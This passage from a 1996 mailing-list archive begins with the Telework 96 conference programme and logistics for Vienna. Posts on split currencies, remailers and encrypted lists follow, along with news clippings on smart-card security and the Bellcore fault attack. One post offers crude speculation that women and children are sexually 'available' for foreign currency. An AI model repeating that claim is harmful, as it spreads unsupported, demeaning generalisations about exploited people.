Telework 96 provides the largest and most comprehensive platform to both observe and promote progress of teleworking in Europe. It is the lead event of the European Telework Week 1996 (ETW 96), which is held under the auspices of the European Commission (DG XIII) from November 4-11, 1996. It is called an "assembly" because of its composition comprising elements of a scientific conference with political debates and of a business exhibition as well. Companies, regional councils, telework pilots (e.g. tele-cottages) and other institutions are invited to participate in an exhibition which is open to the public. Conference meetings in plenaries and parallel sessions are open to experts and representatives of basically five major societal players in the field:
(1) Employers (companies, associations of industrialists, Chambers of Commerce)
(2) Employees (Trade Unions, Shop Stewards, Chambers of Labour, associations of teleworkers)
(3) Politics (from communal, regional, national to European and transnational level, particularly the Inter-Parliamentary Special Interest Group)
(4) Science (experts and analysts of many kinds, consultants and researchers from private and public research centres, universities and international institutions)
(5) NGO's (e.g. environmentalist groupings, women's organisations, youth groups).
Public administration on municipal, regional, federal or European level of course also plays a role which may e.g. in one case appear in the area of politics or in another in that of the employers. In the overall format speakers of the assembly are selected and invited representatives of these groups. Participants of course will represent an even wider spectrum and will have in many regards concurrent and additional knowledge and experience in the themes the assembly deals with. Hence methods and procedures will be imposed to prevent the assembly from becoming a sort of closed shop where experts, known to each other quite well, tell experts what is the experts' expertise. Instruments in this regard are:

+ Careful selection of speakers in the opening event (Monday evening), the plenaries and the parallel track sessions both on Tuesday and Wednesday.

+ Offering an "Open Forum (OF)" concerning the three main topics (track 1: Work, track 2: Training; track 3: Sustainability). This allows interested observers and participants to send in abstracts and posters about their work (be it in research, teleworking pilots, publishing etc.). These contributions will be taken care of by the scientific organizers in the following way: Besides the abstracts of the invited lectures contributions to the OF will be listed in the Proceedings; in each of the track sessions a discussion will be held on how to best publish and further proceed with these pools of knowledge; the "posters" will be exhibited, and the abstracts of written contributions will be distributed during the assembly; publication will be offered on the web (Telework 96 homepage) and a selection of the most relevant contributions will be printed after the event as "Proceedings 2" apart from the lectures of invited speakers ("Proceedings 1").
+ The invention of a "Worker's Tele-Corner": A dedicated workplace in the conference area is connected to a server, bearing all the information brought in through the OF, allowing interested people from around the globe to share information on their teleworking experiences, needs and maybe marketable results. Further to that there will be links not only to the Telework 96 and ECTF homepages, but also to the ETW website http://www.eto.org.uk (e-mail: etw96-info at eto.org.uk), ACTS and Telematics projects networks, and various databanks (building up an "electronic environment" of Telework 96).

+ Teleconferencing between the major events within the assembly and other European conferences operated within the European Telework Week.

+ Arranging "additional events" in Vienna, stimulated by Telework 96 and being also integrated in the framework of the European Telework Week.

+ Allowing manifold concertation meetings among telework oriented European research and development projects.

Josef Hochgerner, Assembly Co-ordinator
Vienna, June 1996

---------------------------------------------------------------

General Information

Conference fee

until September 30, 1996:
Participants ATS 6.300,-- / 480,-- ECU
Students ATS 2.000,-- / 155,-- ECU (Confirmation of the university has to be enclosed)
Day Tickets ATS 4.000,-- / 310,-- ECU

after September 30, 1996:
Participants ATS 7.200,-- / 550,-- ECU
Students ATS 2.400,-- / 185,-- ECU (Confirmation of the university has to be enclosed)
Day Tickets ATS 4.000,-- / 310,-- ECU

Reduced fees (e.g. for members of non profit organizations or participants from Central and Eastern Europe) are available on request.

Press representatives: Please contact the conference secretariat to receive an accreditation.

Fee includes
Participation in all lectures and sessions, two lunches, coffee breaks, cocktail reception, programme, abstract book and proceedings.

Evening reception
Upon invitation by the Mayor of Vienna.
Payment
The fee is payable in international money order to: ECTF Austria - "Telework 96" Account Nr. 784 070 377 Bank Code 20151 Bank Austria, Box 35, A-1011 Vienna without charges for the beneficiary or enclose a cheque to your registration (ATS 2.500,-- maximum per cheque). Confirmation of registration only after receipt of payment! If you pay the fee per bank transfer after October 1, 1996 and do not receive a confirmation of registration, please bring a copy of the money transfer with you.

Cancellations
Cancellations made prior to October 1, 1996 will be charged 50% of the assembly fee (only written cancellations can be accepted). We regret that after this date no cancellations can be accepted.

Exhibition
In the course of the assembly an exhibition presents the most advanced technologies and services to support individuals and organizations who are already or wish to start teleworking. It will be open to the assembly audience as well as to the public. The exhibition will take place in the City Hall around the conference rooms. Information about participation is available at the conference secretariat.

Poster Presentations and Contributions to the "Open Forum"
Poster presentations and abstracts to the "Open Forum" will be accepted until September 30, 1996. Please use the abstract form for sending your submission. Poster size: Max. 90 cm width, 140 cm height. Only participants of the conference can present a poster. Poster presentation does not result in any reduction of the conference fee.

Venue
The Vienna City Hall ("Rathaus") is located in the heart of the city close to the "Ring". It can be reached by underground (U2, station "Rathaus") and tram (D, 1, 2, station "Rathausplatz, Burgtheater").

Languages
Plenary sessions will be interpreted from and into German, English and French, the parallel sessions will be held in English.

Badges
Please note that the badges will be needed for access to all scientific and included social events of the conference.
Parking
In the area around the City Hall parking is only allowed for max. 90 minutes with a special ticket. It is recommended to park cars in one of the garages close to the congress venue.

Airport
The Vienna International Airport is located about 16 km from the city centre. From the airport the city can be reached
- by the airport bus (ATS 70,-- per person) to "City Air Terminal" at the Hotel Hilton
- by Railway / "Schnellbahn" (ATS 34,-- per person) to the station "Wien Mitte"
- by cab (ATS 400,-- - 600,-- per cab)

Climate
In November the weather in Vienna is cool, but usually not unpleasant. It is recommended to take warm clothes with you.

---------------------------------------------------------------

Programme Monday, November 4, 1996

08.00 Registration

09.00 - 17.00 Concertation meetings of European projects on teleworking:

1) ACTS-Concertation Meeting of the GA Telework Chain, involving particularly DIPLOMAT (ACTS 10095, "The European Charter for Telework") and ETD (ACTS 10081, "European Telework Development"). Partners/representatives of other ACTS projects related to telework are invited to participate.

2) Telematics programme, particularly telework oriented TURA-projects ("Telematics for Urban and Rural Areas") will be invited to participate in a "trans-programme" communication to exchange experiences and further exploitation of results across the programmes.

3) Established contacts to DG V and the European Foundation for the Improvement of Living and Working Conditions will lead to their presence in this meeting too; transfer of knowledge is enhanced among the DG's involved and projects started within the Community Initiatives (ADAPT, EMPLOYMENT). Particularly the High Level Expert Group of DG V ("Flynn Commission") is invited to participate.

Meeting rooms and communication facilities are available to be arranged according to demand.
The City of Vienna offers technical assistance to this meeting as well as regarding "Telework 96", because the municipality of Vienna itself participates in several European projects and took on the "Bangemann Challenge". Thus the informatics department will use the Telework Assembly as a demonstrator of its ability of networking and building an electronic environment for the conference. This will apply also to some of the additional events which will take place during the ETW, and secure permanence of information and communication technologies implementation (teleworking facilities) set up to enhance the success of Telework 96 and further achievements of the European Telework Week. 18.30 Welcome Cocktail Welcome Address: Andrew PAGE - President of the ECTF (United Kingdom) 19.30 Evening Opening Event "Tele-Future Without Work?" Rudolf SCHOLTEN - Federal Minister of Science, Transport and the Arts (Austria) Michael HAeUPL - Mayor of the City of Vienna (Austria) (R) Andrew MILLER - Member of the British Parliament (United Kingdom) Upon invitation by Telework 96 and the City of Vienna prominent speakers will present their view on the conference topics from various points. --------------------------------------------------------------- Programme Tuesday, November 5, 1996 PLENARY SESSION "European Dimensions of Teleworking" Moderation: Josef Broukal - ORF / Austrian Broadcasting Corporation (Austria) 09.00 - 09.20 Hannes SWOBODA - Councillor f. Urban Planning and Foreign Affairs (Austria) Cities and the new division of labour in Europe 09.20 - 09.40 Robert VERRUE - Europ. Commission, Director General of DG XIII (Belgium) European policies on telework 09.40 - 10.00 Discussion period 10.00 - 10.30 Etele BARATH - Member of the Hungarian Parliament (Hungary) Building the European Information Society - the Hungarian perspective 10.30 - 11.00 Shalini VENTURELLI - American University, Washington D.C. 
(USA) The policy design of the global Information Society Economic, political and cultural dimensions 11.00 - 11.20 Coffee Break 11.20 - 12.00 Keynote Address by Wouter VAN DIEREN - Institute for Environment and System Analysis (Netherlands) 12.00 - 12.30 Discussion period 12.30 - 14.00 Lunch Break Lunch will be served in the City Hall close to the conference rooms 14.00 - 18.00 TRACKS 1 - 3 (see following pages) 19.30 Evening reception upon invitation by the Mayor of Vienna Videoconference with representatives of Prague and Budapest and corresponding events within the European Telework Week. Cocktail reception: Specialities from Austria, Hungary and the Czech Republic --------------------------------------------------------------- TRACK 1 GETTING PEOPLE TO WORK Tuesday, November 5, 1996 14.00 - 17.30 Wednesday, November 6, 1996 09.00 - 10.45 Restructuring national as well as international labour markets and unemployment will remain top political issues of the next years. Telework '96 will highlight the impact of telework and its legal aspects within new organisational frames of companies, strategic alliances, civic cooperation (NGO's) and private-public partnership. Transnational teleworking may weaken national power. Thus cultural borders and new balances will also appear in the scope of the conference. Co-ordinators: Renate CZESKLEBA - Austrian Trade Unions Confederation (Austria) Andrew MILLER - Interparliamentary Special Interest Group (United Kingdom) Preliminary List of Presentations and Contributions Eduardo BARRERA CORTEZ - INMARK, ECTF (Spain) Towards a European employment agency for teleworkers Willy BUSCHAK - European Trade Unions Confederation (Belgium) Xavier DARMSTAEDTER - President of the Belgian TeleWorking Association, Managing Director of Fischer & Lorenz Benelux (Belgium) Can telework generate employment? 
- The role of Teleworking Associations
Ante JAMTLID - VINDUE (Sweden) / Nathalie FAY - ISDW (USA)
Creating job opportunities by telework development joint venture
Peter JOHNSTON - Europ. Commission, DG XIII, Head of Unit (Belgium)
A Vision for 2010
Georg KAPSCH - Kapsch AG (Austria)
Jens KITTELSEN - European Commission, DG V (Belgium)
Nicole TURBE-SUETENS - Syntaxia (France)
Telework and labour relations
Foundation for the Improvement of Living and Working Conditions (Ireland)
European RTD-projects on teleworking (DIPLOMAT, ETD, DEMETER, MIRTI, TECODIS ...)
Open Forum - Discussion

---------------------------------------------------------------

TRACK 2
TRAINING FOR LIFE IN THE INFORMATION SOCIETY

Tuesday, November 5, 1996 14.00 - 17.30
Wednesday, November 6, 1996 09.00 - 10.45

New ways of teaching, learning, vocational training and continuous education are indispensable prerequisites of socially and economically desirable modes of teleworking. Main topics within this session will be interactive distance learning, knowledge bases and the use of intellectual capital. International links and networks of "virtual colleges" will become enhanced by Telework '96.

Co-ordinators:
Ina WAGNER - University of Technology (Austria)
Noel HODSON - SW 2000 (United Kingdom)

Preliminary List of Presentations and Contributions

Brendan McCARTHY - Victoria University of Technology, Melbourne (Australia)
Learning experiment on teleworking with students
Andrew FRAYLING - Protocol Ltd.
(United Kingdom) IPR - Intellectual property rights and the issues facing the teleworker Charles GRANTHAM - Institute for the Study of Distributed Work (USA) Using new ways of work to create intellectual capital Sigram SCHINDLER, Marc BUCHMANN - Teles GmbH Berlin (Germany) ICARE 9000: A Teletraining Platform for SME's to gain the ISO 9000 Certification Invited speaker of the University of Oxford (United Kingdom) Interactive Distance Learning (IDLE) in Oxford Johann GUeNTHER / Angelika VOLST - Donau University (Austria) TELEMACHOS: Teleuniversity for telematics management Commercial Training Centres Open Forum - Discussion --------------------------------------------------------------- TRACK 3 WORKING TOWARDS SUSTAINABILITY Tuesday, November 5, 1996 14.00 - 17.30 Wednesday, November 6, 1996 09.00 - 10.45 Further implementation of tele-centres and urban telematics creates a new notion of community, both in cities and rural areas. This entangles a series of social issues and paradox interventions. A changing environment may evolve in the wake of the distribution of innovative forms of communication and transportation. Particularly regarding countries in CEE the eventual availability of "shortcuts to sustainability" will be addressed. Co-ordinators: Franz NAHRADA - Globally Integrated Village Environment/CSI (Austria) Katarina ALMQUIST - NUTEK (Sweden) Preliminary List of Presentations and Contributions Eric BRITTON - EcoPlan International (France) Sustainability - from thought to action Mats ENGSTROeM, Walter PAAVONEN - Nordplan (Sweden) Sustainable principles for working organizations Michael ERTEL (Germany) Health and safety aspects of teleworking Maria FISCHER-KOWALSKI - Institute for Interdisciplinary Research and Continuing Education (Austria) Societal Metabolism Michel GIRAUD - Isle de France Neighbourhood Offices Network (France) Distance working - An asset for sustainable development? 
Reza KAZEMIAN - University of Stockholm (Sweden) Telematics on the societal and spatial structures of cities and their hinterlands A Project for sustainable location design Robert PESTEL - European Commission (Belgium) Sustainability in the information society? F.J. RADERMACHER - Forschungsinstitut fur anwendungsorientierte Wissensverarbeitung (Germany) Stable paths into a sustainable world Open Forum - Discussion --------------------------------------------------------------- Programme Wednesday, November 6, 1996 09.00 - 10.45 Continuation of Tracks 1 - 3 09.00 - 10.45 Parallel Meeting of the European Inter-Parliamentary Special Interest Group 10.45 - 11.00 Coffee Break PLENARY SESSION Moderator: Marion FUGLIEWICZ - Communications Consultant (Austria) 11.00 - 12.00 Reports from Tracks 1 - 3 and the Inter-Parliamentary Special Interest Group 12.00 - 12.30 Discussion period 12.30 - 14.00 Lunch Lunch will be served in the City Hall close to the conference rooms 14.00 - 16.00 Round Table Discussion: Political Implications Representative of the Austrian Government Ines UUSMAN - Minister of Transport and Communication (Sweden) European Ministers for Telecom, Work and Social Affairs Representatives of Central and Eastern European Countries Fritz VERZETNITSCH - President of the European Trade Unions Confederation Senior Industrialists European Parliament High Level Expert Group of DG V European Commission Opera, Theater or Concert tickets for your last evening in Vienna On request Austropa Interconvention provides opera, theater or concert tickets. Programmes are available one month in advance. Tickets can be confirmed the earliest 1 month prior to the performance. Prices depend on the seat category and cast. Ticket prices for the Viennese State Opera range from ATS 350, to ATS 2300,, for Musicals from ATS 310, to 1200,, for concerts and other plays from ATS 300, to 850, plus 25% per ticket advance booking fee. 
On November 6, 1996, tickets are available for: Vienna State Opera - Stifelio by Giuseppe Verdi - Carreras, Zampieri, Bruson Please note: Due to this special performance tickets will not be available at regular rates (supplement of approx. 40-50%). We have to point out that for this performance only a very small number of tickets will be available. Volksoper: Land des Laechelns by Franz Lehar Musicals: Theater an der Wien: Elisabeth (in German) Raimund Theater: Beauty and the Beast (in German) --------------------------------------------------------------- Additional Events From Wednesday, 6th of November, onwards a series of relevant workshops, discussions, professional assemblies and promotion activities about teleworking will take place to address a broad local public. These events will be organized by institutions (e.g. Trade Unions or the Chamber of Commerce, schools), existing tele-centres and tele-houses or companies, associations and NGO's, addressing pupils, female workers, unemployed, and people who are looking for new jobs or alternatives to their current working situation. Preliminary List of additional events of Telework 96 Austrian Network of Women (Oesterreichisches Frauennetzwerk) - Workshop "Women on the Data-Highway" Trade Union of Service Industries (Gewerkschaft der Privatangestellten, GPA) - p.r. activities for collective and in-company agreements on Teleworking Telecentre Autokaderstrasse, Vienna - Open House Telecentre of Kapsch AG, Vienna - Open House Ericsson - Open House Federal Ministry of Education/Educational Council of Vienna - Essay Competition among pupils Tele-House Ltd. 
of Lower Austria - Local Demonstrators Telecentre Bruck - Planning Workshop Telecentre Hermagor - Planning Workshop Telecentre Pinkafeld - Planning Workshop --------------------------------------------------------------- Accompanying Persons' Programme (Optional Tours) Vouchers for optional tours will be handed over to the participants/accompanying persons at the AUSTROPA INTERCONVENTION DESK. AUSTROPA INTERCONVENTION reserves the right to cancel tours should the minimum number of people not be reached. Tuesday, November 5, 1996 City Tour: "Historic Vienna" including a visit to the Schoenbrunn Palace Departure from the Rathaus at 9 AM, duration approx. 3 This tour gives an overall view of the city and also leads to some prominent sights. Driving along the Ringstrasse, a circular boulevard of 4 kilometers, which was built during mid last century, one can see many impressive buildings, such as the State Opera, the Burgtheater, various Museums, the Parliament, the City Hall and the University. The highlight of the tour is the visit to the Schoenbrunn Palace, the summer residence of the Austrian Emperors. Price per person, incl. bus tour, guide and entrance fee ATS 320, Minimum of 25 people per bus Excursion: "Kahlenberg - Klosterneuburg" Departure from the Rathaus at 2PM, duration approx. 3 hours On the way to the Danube the bus drives through the north eastern part of the city offering a magnificent view of the hills surrounding Vienna, the so called "Wienerwald". Via the scenic route and passing through some well-known Heurigen villages, you reach the Kahlenberg. This lookout offers a good view of the entire city. The bus tour continues to Klosterneuburg, the first residence of the Babenberg family in the area of Vienna during the early medieval times. The most prominent site to visit is the Abbey of the Augustinian Friars, founded before 1108. 
The unique romanesque Verdun Altar with its 51 enamelled tablets by Nikolaus von Werden, dated 1181, is the most valuable piece of art in the abbey. Price per person, incl. bus tour, guide and entrance fees ATS 290, Minimum of 25 people per bus Wednesday, November 6, 1996 Arts and Crafts in Vienna Departure from the Rathaus at 9.30AM, duration approx. 2 The "Augarten" Porcelain Manufactory was established in Vienna as early as 1718. Many of the common designs still have their origin in the times of Empress Maria Theresia who recognized the importance of creative craftsmanship for economy. You will be guided through the production area and the adjacent showroom. The Museum of Applied Arts, recently renovated, houses a large collection of furniture, glass and objects for daily use from baroque times to the beginning of the 20th century. Particularly interesting are cutlery, jewellery etc. by Kolo Moser, all types of chairs by the Thonet Brothers and designs by Josef Hofmann. Price per person, incl. bus tour, guide and entrance fees ATS 320, Minimum of 25 people per bus Imperial Vienna: Treasury and Imperial Burial Vault Meeting place: Rathaus at 2PM, duration approx. 2 The treasury is the oldest part of the Hofburg, mentioned already in the 13th century and contains a display of priceless treasures that bears witness to the former imperial power: insignias and jewels over a thousand years old of the Roman-German Empire and the treasury of the Order of the Golden Fleece. Afterwards, visit of the Imperial Burial Vault, where more than 130 Habsburgs were buried, among them 12 emperors and 16 empresses. The design of the coffins shows the change in the comprehension of arts over three centuries. Price per person, incl. guide and entrance fees ATS 250, Minimum of 15 people per group Tours are subject to change. 
--------------------------------------------------------------- Hotel and Travel Arrangements Austropa-Interconvention, Oesterreichisches Verkehrsburo AG, has been entrusted by the organising committee to handle all hotel reservations and asks all participants, to reserve rooms with the enclosed hotel reservation form only. The exact indication of arrival and departure dates, as well as the desired hotel category is necessary. Please make your selection of hotel category according to the following list. Should the requested category not be available anymore, a booking in the next higher category will be made. All prices quoted are per night, per room and include daily breakfast, service charges and all taxes. 1. Category A**** Deposit ATS 2.000, per room Single room ATS 980, to ATS 1.600, Double room ATS 1.450, to ATS 2.360, 2. Category B *** Deposit ATS 1.500, per room Single room ATS 650, to ATS 980, Double room ATS 990, to ATS 1.380, 3. Pension - Category B*** Deposit ATS 1.000, per room Single room ATS 650, Double room ATS 1.100, to ATS 1.290, All rooms with bath or shower and toilette. Please book your hotel before September 30, 1996 Methods of payment for hotel deposits and optional tours Please send a cheque or money order together with the hotel accommodation booking form to Austropa Interconvention, P.O.Box 30, A-1043 Vienna, Austria, or make a bank transfer FREE OF BANK CHARGES to the AUSTROPA account no.: 0035-14775/00 at the Creditanstalt-Bankverein, Vienna, bankcode 11.000. All payments are to be made in Austrian Schillings (ATS). Please do not forget to indicate the name of the participant and the purpose of payment. After the receipt of your deposit we will send you a hotel voucher, indicating the name and exact address of the hotel booked. Kindly inform Austropa Interconvention immediately of any changes in the dates of arrival or departure and in case of cancellation. 
For cancellations up to one week prior to arrival, a handling fee of ATS 300, per booking will be charged. Afterwards, no more refunds of hotel deposits will be possible. --------------------------------------------------------------- All inclusive Flight Arrangements Austropa Interconvention in cooperation with Austrian Airlines and other IATA carriers offers the participants of the "TELEWORK '96 Congress" all inclusive flight arrangements. These arrangements include the following services: Economy class return ticket on regular flights, 20 kg (44 lbs) baggage allowance, 5 nights accommodation in a double room with bath/shower/WC of hotels in the 3*** category, buffet breakfast, service charges, taxes, transfer from the airport to the hotel and vice versa. All airport taxes are INCLUDED. For participants, travelling alone, please add the single room supplement as listed below. Booking deadline: September 30, 1996. Payment: Please note, that your ticket can be issued only after receipt of full prepayment. Tickets will be mailed to participants after September 30, 1996. Cancellation policies: In case of cancellation or changes before September 30, 1996, Austropa Interconvention will charge a handling fee of ATS 1.000, per person. For cancellations after September 30, 50% of the total cost of the flight arrangement will be charged to the participant. Changes of flight dates are not possible after September 30. All cancellations and changes have to be made in writing. Flight dates: Arrival in Vienna: November 2, 1996 Departure from Vienna: November 7, 1996 If you wish to book different dates or destinations than indicated, please contact Austropa Interconvention. All prices are in Austrian Schillings and are based on ticket prices and exchange rates per January 1996. Prices are subject to changes. Sunday rule applies. 
Place of Dep *** Hotel Rom 9.785,-- Paris 9.975,-- London 8.295,-- Madrid 10.745,-- Lissabon 11.080,-- Genf 9.540,-- Zurich 9.025,-- Kopenhagen 9.930,-- Amsterdam 9.960,-- Stockholm 10.480,-- Helsinki 12.285,-- Hamburg 11.925,-- Dusseldorf 11.523,-- Frankfurt 10.385,-- Stuttgart 10.015,-- Munchen 8.685,-- Berlin 10.530,-- Dresden 9.965,-- Leipzig 9.965,-- Bremen 12.970,-- Munster 12.645,-- Friedrichshafen 13.530,-- Single room supplement for 5 nights, Hotel *** ATS 800, From jamesd at echeque.com Mon Sep 30 18:58:45 1996 From: jamesd at echeque.com (James A. Donald) Date: Tue, 1 Oct 1996 09:58:45 +0800 Subject: the theory of split currency Message-ID: <199609302118.OAA11208@dns2.noc.best.net> Fred Foldvary wrote: > Is there a name for a dual or split currency, in which > there is one currency for domestic use and another, different > appearing, currency for foreign usage? > > Does anyone know of any country which has had such a > split currency? Many third world nations employed this system, one currency for internal use only, and one currency for international transactions. The international currency was sometimes denominated in hard currency, and reasonably convertible into it. This strategy was frequently associated with police state tactics, lawless imprisonment, and swift execution, for vaguely defined economic crimes. It has become substantially less common in the nineties. The external currency tended to spread into the internal economy, despite police state measures to prevent this from happening, and the internal currency tended to become worthless and could only be spent while holding a gun to the head of the person accepting it. In countries employing this system, women, and often children of both sexes, are often cheaply available for sexual purposes if you have foreign currency. 
I speculate that this is because people find that they *must* obtain foreign currency, the internal currency being unspendable, and any method available to them for obtaining foreign currency is a criminal offense. A retreat from this system, usually by allowing the international currency to freely penetrate the internal economy, tends to be associated with a substantial reduction in the availability of young girls, as for example in Cuba recently. > This scenario is not entirely hypothetical. I have read that > Senator Patrick Leahy introduced Senate Bill #307 to create > such a split currency. Why am I not surprised that it was Senator Patrick Leahy of crypto bill fame? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From cybergod at nfx.net Mon Sep 30 19:07:06 1996 From: cybergod at nfx.net (cybergod at nfx.net) Date: Tue, 1 Oct 1996 10:07:06 +0800 Subject: Unsubscribing Message-ID: <1.5.4.16.19960930185337.3d375a62@nfx.net> How do I unsubscribe? Thank you very much.. 
PGP Encrypted Messages Preferred: From iang at cs.berkeley.edu Mon Sep 30 19:19:42 1996 From: iang at cs.berkeley.edu (Ian Goldberg) Date: Tue, 1 Oct 1996 10:19:42 +0800 Subject: POLL RESULTS In-Reply-To: Message-ID: <52phjn$fjs@abraham.cs.berkeley.edu> In article , Sandy Sandfort wrote: >Last week I offered an informal poll as to the reputational >effect of "John Anonymous MacDonald" and other apparent nyms. Just remember that "John Anonymous MacDonald" is the name that appears on _every_ item remailed from the jam remailer, ; it's not a nym belonging to a single person. - Ian From scs at lokkur.dexter.mi.us Mon Sep 30 20:26:40 1996 From: scs at lokkur.dexter.mi.us (Steve Simmons) Date: Tue, 1 Oct 1996 11:26:40 +0800 Subject: Encrypted lists and ease of use In-Reply-To: Message-ID: <199610010016.UAA17469@lokkur.dexter.mi.us> >Why do you need two lists? 
My server currently hosts a few such lists >(for non-profit international technical projects, extended family >news, etc.) . . . Your solution is exactly what I want to do with the -encrypted list. The reason we want two is that 80-90% of what goes across the list is not sensitive. That kind of thing we want in plaintext for nice tools like grep and glimpse. From dlv at bwalk.dm.com Mon Sep 30 20:33:57 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 1 Oct 1996 11:33:57 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: <8LV3uD1w165w@bwalk.dm.com> New York Times: Thursday, September 26, 1996 Potential Flaw Seen In Cash Card Security By John Markoff A potential security flaw has been discovered that might make it possible to counterfeit many types of the electronic-cash ``smart cards'' that are now widely used in Europe and are being tested in this country by banks and credit card companies - including Visa and Mastercard. The types of smart cards that are potentially at risk include the kinds already employed in the Mondex cash card system and others used by European consumers. A cash card from Visa International Inc. was demonstrated in a highly publicized trial at last summer's Olympic Games in Atlanta. Chase Manhattan Corp.; Citibank, a unit of Citicorp, Mastercard International Inc., and Visa plan a test this year with 50,000 customers in New York City. Touted as the key to the cashless society of the near future, smart cards are credit card-sized packets that contain a microprocessor chip and a small amount of computer memory for storing bits of electronic information that represent money. At businesses equipped with the computerized devices that accept smart-card payments, the cards are supposed to be as good as cash - and as vulnerable to theft or loss as a $100 bill. 
But the cards have been promoted as tamper-proof, which is why computer scientists at Bell Communications Research, one of the nation's leading information-technology laboratories, are now sounding the alarm, saying that a sophisticated criminal might be able to tweak a smart-card chip to make a counterfeit copy of the monetary value on a legitimate card. ``If you're deploying these smart-card devices in a business or government electronic-payment system, then I think you need to look carefully at their actual security,'' said Richard Lipton, chief scientist at Bell Communications and a professor of computer science at Princeton University. Lipton and two colleagues at Bell Communications Research - or Bellcore - are about to publish a research paper on the potential smart-card flaw, which they recently discovered through theoretical research on the technology. No smart-card counterfeiting has been discovered yet, but Lipton and his team believe that such crimes are inevitable unless the technology is redesigned. The researchers have also been quietly notifying the seven regional Bell telephone companies that jointly own Bellcore about their discovery. Bell companies including US West, and long-distance companies, including AT&T Corp., have been planning to market smart cards as a secure way to pay for long-distance calls without entering credit card numbers or generating the audit-trail of a phone bill. Despite the Bellcore warning, not all executives at companies using smart cards consider the theoretical threat a real danger. ``This is very speculative,'' said Chris Jarman, vice president of chip card technology at Mastercard, who had seen a draft of the Bellcore research paper. ``I have yet to see a smart-card scheme with a vulnerability,'' Jarman said. 
And even some industry executives, who said it was conceivable that individual smart cards might be at risk, contended that the vulnerability was not a threat to smart-card technology in general - any more than the occasional passing of a counterfeit $20 bill undermines the U.S. currency system. ``This is a significant event but it doesn't blow the industry apart,'' said William Barr, vice president of the Smart Card Forum, a trade organization of 230 U.S. companies and government agencies. Still, Barr conceded, ``this approach offers some ability to mount attacks that have not been anticipated.'' The Bellcore researchers, however, consider the potential flaw significant because it could short-circuit the data-scrambling software contained in many types of smart cards. The software is used to protect the card's secret code, which is designed to prevent counterfeiting. In theory, at least, the Bellcore researchers said that a smart card's security could be breached by forcing the microchip in the card to make a calculation error. This could be done in a number of ways, the researchers said, whether through sophisticated means like bombarding the card with radiation or perhaps cruder methods like placing it in a microwave oven. Once the card can be forced to make even a small calculating error, the researchers said that a mathematical formula they derived could use this error to extrapolate the secret data that authenticates the card when it is inserted in a merchant's card reader. The researchers suggested that in any system where it was possible to know about a calculation error it might be possible to exploit this newly discovered vulnerability. The Bellcore team is conducting further research into this possibility. ``These systems tend to have a fragile behavior,'' said another of the researchers, Richard A. DeMillo, who is vice president for information technology at Bellcore. 
``Our technique is like a tiny lever that makes it possible to pry open the vault that the secret information is stored in.'' U. S. Banker: Thursday, September 26, 1996 Mondex gets Cold, Hard Cash By Joseph Radigan The $ 119 million that National Westminster Bank plc and Midland bank plc raised this summer to fund their Mondex smart card program should provide at least some of the capital they'll need to increase its acceptance. The capital was raised in conjunction with Mondex's spinoff from the two British banks that created the program as a joint venture five years ago. The new setup is being called "Mondex International," and besides NatWest and Midland, which now hold minority stakes, it includes 15 other shareholding banks. One of them is Hongkong and Shanghai Banking Corp., which like Midland is owned by HSBC Group of London. In the U.S., Wells Fargo & Co. and AT&T Corp.'s Universal Card Services Group paid a combined $ 46.5 million for their 30% stake. The other investors include major banks in Canada, Australia and New Zealand. Another 23.5% remains to be sold for roughly $ 1.5 million for each 1% interest. Not all the new funds are going toward Mondex's future development. Some will be used to compensate NatWest for the costs it incurred in leading the original research and development. NatWest's Michael Keegan became Mondex's chief executive as part of the restructuring, replacing Tim Jones, a fellow NatWest executive who had been Mondex's CEO through its startup phase. Jones is returning to NatWest as the managing director for the London bank's electronic commerce group and will keep a seat on the card association's board. David Mills, who runs Midland Bank's retail banking business will stay on as chairman of Mondex International, but he also has a seat on the board of MasterCard's European affiliate, Europay. These two card associations, in conjunction with Visa, are backing a smart card program that rivals Mondex's. 
But Keegan says that this does not pose a conflict of interest. As in the American credit card business, where banks are free to issue both MasterCard and Visa, Keegan foresees a future in which Mondex members will issue both Mondex and Europay smart cards. Now that Mondex is in the process of collecting the financial fuel it will need to fund its growth, the smart card organization's future revenue will come mostly from annual dues paid by member banks, Keegan says. The per-transaction interchange fee that supplies MasterCard and Visa with most of their annual revenue is not practical for the low-value payments for which smart cards are intended. Imposing a transaction fee on these would make the system impractical. In addition, because Mondex attempts to electronically mimic currency, most transactions will not settle through a captive payments clearing system. The only settlement will take place on an end-of-day basis when merchants or customers redeem their Mondex value at their local banks. San Francisco Chronicle: Thursday, September 26, 1996 Hundreds of Companies Have Smart Card Systems By Laura Castaneda The smart money is on smart cards -- even though most consumers have yet to lay a finger on them. Valerie Baptiste is one exception. The Wells Fargo secretary is participating in a company experiment that lets her make purchases at 22 San Francisco shops with a smart card. Resembling credit cards, smart cards are embedded with computer chips. They can store cash and other data such as medical history and credit information. ''A big advantage is the convenience of not having to fumble around in my purse for cash,'' said Baptiste as she was buying juice at The Wildflower Cafe. Hundreds of companies besides Wells Fargo, including several in the Bay Area, have launched smart card pilot programs to try and cash in on the cashless society of the future. Getting merchants and customers to accept and use a new form of payment won't happen overnight. 
But experts believe the widespread acceptance of smart cards is inevitable. ''I'm confident that the push will be on to make it happen because there are so many powerful entities interested in seeing cash go away,'' said Bruce Brittain of Brittain Associates in Atlanta, a consumer behavior research firm. David Poe, a director of Edgar Dunn & Co. in San Francisco, a management consulting firm that specializes in new product development, agreed. ''I think (smart card use) is going to be evolutionary as opposed to revolutionary,'' he said. Entities that want to cut down on the use of cash include big banks, credit card issuers, universities and the U.S. government. Why? Smart cards can save the cost of collecting, counting, securing and transferring cash. Most pilot programs feature smart cards that simply store cash, usually up to $ 20. The amount of each purchase is electronically deducted from the card at the point-of-sale. These kinds of smart cards are ideal for smaller transactions like parking, lunches, dry cleaning, convenience stores, vending machines and fast food. However, smart card technology is almost limitless. Combining computer chips and magnetic stripes allows a single card to be used as a cash, credit, debit and ATM card. Among the pilot programs in place: * Bank of America and Visa International are experimenting with employee-only stored value smart cards for purchases from company cafeterias and vending machines and some outside merchants. * Ohio and Wyoming plan to start using smart cards for food stamp and nutrition programs, and the U.S. Department of Defense is testing a multiapplication smart card at military bases in Hawaii. * The Washington, D.C., transit system plans to implement smart card technology for fares, and the Metropolitan Transit Commission, which serves 25 Bay Area transit services, is also considering launching smart card technology in about two years. 
